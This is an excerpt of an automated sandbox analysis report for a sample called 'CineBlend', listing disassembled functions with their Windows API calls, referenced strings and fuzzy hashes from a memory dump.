SelectObject.GDI32(00000000,00000000), ref: 00BD4AFB
GetPixel.GDI32(00000000,00000000,00000000), ref: 00BD4B06
DeleteDC.GDI32(00000000), ref: 00BD4B10
GetWindowLongW.USER32(?,000000EC), ref: 00BD4B1A
SetLayeredWindowAttributes.USER32(?,?,00000000,00000001,?,00000000,?), ref: 00BD4B30
DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?), ref: 00BD4B3C

Strings

static, xrefs: 00BD4A71

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
String ID: static
API String ID: 2559357485-2160076837
Opcode ID: 6e07656b5d13a0aab36fa5e661007cb9787e8ec64d094679b3d27033e41f3c2c
Instruction ID: 0ebd6ced8d67d98ec23b148ea8142538f1337d23c96c85a81aa423e452f5b4e2
Opcode Fuzzy Hash: 6e07656b5d13a0aab36fa5e661007cb9787e8ec64d094679b3d27033e41f3c2c
Instruction Fuzzy Hash: EA319231141215BBDF119F64DC08FDABBA9FF0D324F110252FA54A61A0EB35D810DB94

Function 00BC468D Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00BC46B9
CoInitialize.OLE32(00000000), ref: 00BC46E7
CoUninitialize.OLE32 ref: 00BC46F1
_wcslen.LIBCMT ref: 00BC478A
GetRunningObjectTable.OLE32(00000000,?), ref: 00BC480E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00BC4932
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00BC496B
CoGetObject.OLE32(?,00000000,00BE0B64,?), ref: 00BC498A
SetErrorMode.KERNEL32(00000000), ref: 00BC499D
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BC4A21
VariantClear.OLEAUT32(?), ref: 00BC4A35

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 403fdf2def10b0bf2420ec5e5becd418d1a54bdeeaf9849db026fd8bc57145df
Instruction ID: 2709720c6aa288205160f32fab975a836a4d55237d63179e1db0b778e89d3fb8
Opcode Fuzzy Hash: 403fdf2def10b0bf2420ec5e5becd418d1a54bdeeaf9849db026fd8bc57145df
Instruction Fuzzy Hash: 76C11371608201AFD700DF68C894E2BB7E9FF89748F10499DF98A9B250DB71EE45CB52

Function 00BB84DB Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00BB8538
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00BB85D4
SHGetDesktopFolder.SHELL32(?), ref: 00BB85E8
CoCreateInstance.OLE32(00BE0CD4,00000000,00000001,00C07E8C,?), ref: 00BB8634
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00BB86B9
CoTaskMemFree.OLE32(?,?), ref: 00BB8711
SHBrowseForFolderW.SHELL32(?), ref: 00BB879C
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00BB87BF
CoTaskMemFree.OLE32(00000000), ref: 00BB87C6
CoTaskMemFree.OLE32(00000000), ref: 00BB881B
CoUninitialize.OLE32 ref: 00BB8821

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: adb6400a642150f50ba97a6af27ebcea5aabc3dab788aadc8308e1a0777f60a9
Instruction ID: 9a31ed4498b95f3b655723676180e8d04d36885df944fd627f5616d09dd6b0f7
Opcode Fuzzy Hash: adb6400a642150f50ba97a6af27ebcea5aabc3dab788aadc8308e1a0777f60a9
Instruction Fuzzy Hash: 06C11B75A00109AFCB14DFA4C884DAEBBF9FF48304B148599E41ADB361DB71EE45CB90

Function 00BD5EBC Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00BD5FA3
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD5FB4
CharNextW.USER32(00000158), ref: 00BD5FE3
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00BD6024
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00BD603A
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00BD604B

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: 2238d511a195fd59d0b2c9491f6a80d8947d8726058129f72bc65c50235f014e
Instruction ID: 3b74726cf13c62cb1ed5b0b2cf0a3272449479527e380f23b53fba0b7b024dbe
Opcode Fuzzy Hash: 2238d511a195fd59d0b2c9491f6a80d8947d8726058129f72bc65c50235f014e
Instruction Fuzzy Hash: A8617F35901209ABDF219F58CC84EFEBBF8EB09720F108187F965AB391E7749945DB60

Function 00BA0378 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00BA039F
SafeArrayAllocData.OLEAUT32(?), ref: 00BA03F8
VariantInit.OLEAUT32(?), ref: 00BA040A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00BA042A
VariantCopy.OLEAUT32(?,?), ref: 00BA047D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00BA0491
VariantClear.OLEAUT32(?), ref: 00BA04A6
SafeArrayDestroyData.OLEAUT32(?), ref: 00BA04B3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BA04BC
VariantClear.OLEAUT32(?), ref: 00BA04CE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00BA04D9

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 300574854e2b40b0f1fcbfff0757ed9376b837a043dcde2c8c173e23d3544015
Instruction ID: 1538b9bb056dd44c05c87cc09a0e4e936838fa71f9848fbff63b051c72768f7e
Opcode Fuzzy Hash: 300574854e2b40b0f1fcbfff0757ed9376b837a043dcde2c8c173e23d3544015
Instruction Fuzzy Hash: 82417131A042199FDF00EF64D8549ADBBF9FF09344F0080A5E955A7361DB70A945CF90

Function 00BAA635 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00BAA65D
GetAsyncKeyState.USER32(000000A0), ref: 00BAA6DE
GetKeyState.USER32(000000A0), ref: 00BAA6F9
GetAsyncKeyState.USER32(000000A1), ref: 00BAA713
GetKeyState.USER32(000000A1), ref: 00BAA728
GetAsyncKeyState.USER32(00000011), ref: 00BAA740
GetKeyState.USER32(00000011), ref: 00BAA752
GetAsyncKeyState.USER32(00000012), ref: 00BAA76A
GetKeyState.USER32(00000012), ref: 00BAA77C
GetAsyncKeyState.USER32(0000005B), ref: 00BAA794
GetKeyState.USER32(0000005B), ref: 00BAA7A6

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: fb11a4a2bd2d50e2ec5d17c22df0f678c7adaa85a24c306a53259b635ab334fd
Instruction ID: c655f7184c5929b9244379789d7289ae36a0c76ae151ed94732447e4c811fa85
Opcode Fuzzy Hash: fb11a4a2bd2d50e2ec5d17c22df0f678c7adaa85a24c306a53259b635ab334fd
Instruction Fuzzy Hash: 8F4192645497C969FF31966488543A6BEF0EB23344F0880DAD5C65A1C2EBA49DC8CBB3

Function 00BC0FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00BC1019
inet_addr.WSOCK32(?), ref: 00BC1079
gethostbyname.WSOCK32(?), ref: 00BC1085
IcmpCreateFile.IPHLPAPI ref: 00BC1093
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BC1123
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BC1142
IcmpCloseHandle.IPHLPAPI(?), ref: 00BC1216
WSACleanup.WSOCK32 ref: 00BC121C

Strings

Ping, xrefs: 00BC10D3

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: cb5b27ac68eca9728da8a07e97a4fd1068667db66cddf57d4105b36238af77d1
Instruction ID: cd836f996d2c44b631360590333e9806f34ddf56281aec1de8687fcf04fb9411
Opcode Fuzzy Hash: cb5b27ac68eca9728da8a07e97a4fd1068667db66cddf57d4105b36238af77d1
Instruction Fuzzy Hash: C4919F316042419FD720DF19C888F16BBE4EF46318F1889EDF5A9AB6A2C735ED45CB81

Function 00BC9730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00BC9750

Part of subcall function 00BA9805: _wcslen.LIBCMT ref: 00BA9828

_wcslen.LIBCMT ref: 00BC97AB
_wcslen.LIBCMT ref: 00BC97F9
_wcslen.LIBCMT ref: 00BC9839
_wcslen.LIBCMT ref: 00BC98CB

Strings

none, xrefs: 00BC98C2, 00BC98C7
stdcall, xrefs: 00BC9833, 00BC9838
winapi, xrefs: 00BC97F3, 00BC97F8
cdecl, xrefs: 00BC97A5, 00BC97AA

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: c24ff515294eafdaa270df491c667768ae20b74238696ab41bb414a2a9cb8599
Instruction ID: e64c378f38a3da4f0b5fdf4b979ec7105e44b345f1f5a9bd28fb659c203d4985
Opcode Fuzzy Hash: c24ff515294eafdaa270df491c667768ae20b74238696ab41bb414a2a9cb8599
Instruction Fuzzy Hash: AD51C031A015169BEB14DF68C984EBEB3E5FF25360B2042ADF866E7284DB31DE40C790

Function 00BC4189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00BC41D1
CoUninitialize.OLE32 ref: 00BC41DC
CoCreateInstance.OLE32(?,00000000,00000017,00BE0B44,?), ref: 00BC4236
IIDFromString.OLE32(?,?), ref: 00BC42A9
VariantInit.OLEAUT32(?), ref: 00BC4341
VariantClear.OLEAUT32(?), ref: 00BC4393

Strings

Failed to create object, xrefs: 00BC4241, 00BC42F7
Invalid parameter, xrefs: 00BC42C2
NULL Pointer assignment, xrefs: 00BC427B

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: c510bb5f3f9ea888031bb07bbaecfd01588ef8f88b8f682f6dd71ebf65dd956a
Instruction ID: 7f9f1eefe6517b843ee512e074d7ca45db038a298bf74afbe7408025eee19a4f
Opcode Fuzzy Hash: c510bb5f3f9ea888031bb07bbaecfd01588ef8f88b8f682f6dd71ebf65dd956a
Instruction Fuzzy Hash: 5761B071608701AFC310DF64D899F6ABBE4EF89714F00499DF9819B291DB70EE48CB92

Function 00BB8BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00BB8C9C
SystemTimeToFileTime.KERNEL32(?,?), ref: 00BB8CAC
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BB8CB8
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00BB8D55
SetCurrentDirectoryW.KERNEL32(?), ref: 00BB8D69
SetCurrentDirectoryW.KERNEL32(?), ref: 00BB8D9B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00BB8DD1
SetCurrentDirectoryW.KERNEL32(?), ref: 00BB8DDA

Strings

*.*, xrefs: 00BB8DE0

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local$System
String ID: *.*
API String ID: 1464919966-438819550
Opcode ID: 227b58f93c12e2daa3ed0991ba37d0077070b9f6cdf2caedfd7abf0b953241e9
Instruction ID: 19ddc62be12444e934397813d6da48b9477af8dc4705c03ddaf4783186f58539
Opcode Fuzzy Hash: 227b58f93c12e2daa3ed0991ba37d0077070b9f6cdf2caedfd7abf0b953241e9
Instruction Fuzzy Hash: 40615BB2504305AFCB10EF60C8459AEB7ECFF89310F0449AEF99987251DB71EA45CB92

Function 00BB3DCD Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00BB3E14

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00BB3E35

Strings

"%s" (%d) : ==> %s:, xrefs: 00BB3F67
"%s" (%d) : ==> %s:%s%s, xrefs: 00BB3F49
Incorrect parameters to object property !, xrefs: 00BB3EF0
Error: , xrefs: 00BB3F16
^ ERROR , xrefs: 00BB3EE3
Line %d (File "%s"):, xrefs: 00BB3E88, 00BB3EA1

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 8df1f4c4094110e730fbf6c6675d53b33a97a50b6cc61b749032477d98e63ded
Instruction ID: 17bf01ef5ec046eeb24aad1f79d7920c8c99607c919dc15db3d0b21b0bbd672b
Opcode Fuzzy Hash: 8df1f4c4094110e730fbf6c6675d53b33a97a50b6cc61b749032477d98e63ded
Instruction Fuzzy Hash: 0C515B71D0020AAACB15EBA0DD46EEEB7F8EF14700F1041E5B505720A2EB716F59EB61

Function 00BB5DD8 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00BB5DE5
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00BB5E5B
GetLastError.KERNEL32 ref: 00BB5E65
SetErrorMode.KERNEL32(00000000,READY), ref: 00BB5EEC

Strings

UNKNOWN, xrefs: 00BB5E89
INVALID, xrefs: 00BB5E9E
READY, xrefs: 00BB5EA5, 00BB5EAD
NOTREADY, xrefs: 00BB5E90
READONLY, xrefs: 00BB5E97

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: eb3a0ac1fdfffdc073d8fec35d62ac27c9a027f20a35784ddd88d2e41c992358
Instruction ID: ff742ffd84b8120d877f0dde433466b9e394a22cbd452b8819e304e22330b9f4
Opcode Fuzzy Hash: eb3a0ac1fdfffdc073d8fec35d62ac27c9a027f20a35784ddd88d2e41c992358
Instruction Fuzzy Hash: 4D317E75A00604DFCB20DF68C498BBABBF4EF45304F1480A5E405DB296D7B1EE42CB92

Function 00BD46E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00BD4715
SetMenu.USER32(?,00000000), ref: 00BD4724
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00BD47AC
IsMenu.USER32(?), ref: 00BD47C0
CreatePopupMenu.USER32 ref: 00BD47CA
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00BD47F7
DrawMenuBar.USER32 ref: 00BD47FF

Strings

F, xrefs: 00BD47EA
0, xrefs: 00BD46F0

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: 3557a840cc889e1ad20b6ee5d403478a0fa42ad431cb11f7739dd8c67bb0be10
Instruction ID: 6744e43e557cd99b79311bdc06e8e5cf5443c71a5d9ec8135d370e5aa0c4da43
Opcode Fuzzy Hash: 3557a840cc889e1ad20b6ee5d403478a0fa42ad431cb11f7739dd8c67bb0be10
Instruction Fuzzy Hash: 46416979A02209EFDB14CF64E894FAABBF5FF09314F14406AFA4597350E771A910DB50

Function 00BA282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620

SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00BA28B1
GetDlgCtrlID.USER32 ref: 00BA28BC
GetParent.USER32 ref: 00BA28D8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA28DB
GetDlgCtrlID.USER32(?), ref: 00BA28E4
GetParent.USER32(?), ref: 00BA28F8
SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA28FB

Strings

ComboBox, xrefs: 00BA2839
ListBox, xrefs: 00BA286E

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_wcslen
String ID: ComboBox$ListBox
API String ID: 711023334-1403004172
Opcode ID: a3e6830f2f5e31f24f9c8b4029f01b0f887e81019e1f03a8aa272ca304a3ff79
Instruction ID: bd55e96ac3a6f58c56232bc90469e4081bc751381172bc615ea4392542f4f357
Opcode Fuzzy Hash: a3e6830f2f5e31f24f9c8b4029f01b0f887e81019e1f03a8aa272ca304a3ff79
Instruction Fuzzy Hash: 9821B074E00118BBCF04AFA4CC95DEEBBB4EF06310F0001A6B991A72D1DB758918DB60

Function 00BA290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B4B329: _wcslen.LIBCMT ref: 00B4B333

Part of subcall function 00BA45FD: GetClassNameW.USER32(?,?,000000FF), ref: 00BA4620

SendMessageW.USER32(?,00000186,00020000,00000000), ref: 00BA2990
GetDlgCtrlID.USER32 ref: 00BA299B
GetParent.USER32 ref: 00BA29B7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA29BA
GetDlgCtrlID.USER32(?), ref: 00BA29C3
GetParent.USER32(?), ref: 00BA29D7
SendMessageW.USER32(00000000,?,00000111,?), ref: 00BA29DA

Strings

ComboBox, xrefs: 00BA291A
ListBox, xrefs: 00BA294F

Memory Dump Source

Source File: 00000021.00000002.1809675744.0000000000B41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B40000, based on PE: true

Associated: 00000021.00000002.1809657215.0000000000B40000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000BDD000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809734445.0000000000C03000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809784288.0000000000C0D000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000021.00000002.1809808119.0000000000C15000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_33_2_b40000_CineBlend.jbxd

Similarity

